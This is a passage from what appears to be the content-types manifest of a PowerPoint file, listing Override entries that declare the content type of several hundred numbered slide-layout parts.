  <Override PartName="/ppt/slideLayouts/slideLayout692.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout693.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout694.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout695.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout696.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout697.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout698.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout699.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout70.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout700.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout701.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout702.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout703.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout704.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout705.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout706.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout707.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout708.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout709.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout71.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout710.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout711.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout712.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout713.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout714.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout715.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout716.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout717.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout718.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout719.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout72.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout720.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout721.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout722.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout723.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout724.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout725.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout726.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout727.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout728.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout729.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout73.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout730.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout731.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout732.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout733.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout734.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout735.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout736.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout737.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout738.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout739.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout74.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout740.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout741.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout742.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout743.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout744.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout745.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout746.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout747.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout748.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout749.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout75.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout750.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout751.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout752.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout753.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout754.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout755.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout756.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout757.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout758.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout759.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout76.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout760.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout761.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout762.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout763.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout764.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout765.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout766.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout767.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout768.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout769.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout77.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout770.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout771.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout772.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout773.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout774.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout775.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout776.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout777.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout778.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout779.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout78.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout780.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout781.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout782.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout783.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout784.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout785.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout786.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout787.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout788.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout789.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout79.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout790.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout791.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout792.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout793.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout794.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout795.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout796.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout797.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout798.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout799.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout80.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout800.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout801.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout802.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout803.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout804.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout805.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout806.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout807.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout808.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout809.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout81.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout810.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout811.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout812.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout813.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout814.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout815.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout816.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout817.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout818.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout819.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout82.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout820.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout821.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout822.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout823.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout824.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout825.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout826.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout827.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout828.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout829.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout83.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout830.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout831.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout832.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout833.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout834.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout835.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout836.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout837.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout838.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout839.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout84.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout840.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout841.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout842.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout843.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout844.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout845.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout846.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout847.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout848.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout849.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout85.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout850.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout851.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout852.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout853.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout854.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout855.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout856.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout857.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout858.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout859.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout86.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout860.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout861.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout862.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout863.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout864.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout865.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout866.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout867.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout868.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout869.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout87.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout870.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout871.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout872.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout873.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout874.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout875.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout876.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout877.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout878.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout879.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout88.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout880.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout881.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout882.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout883.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout884.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
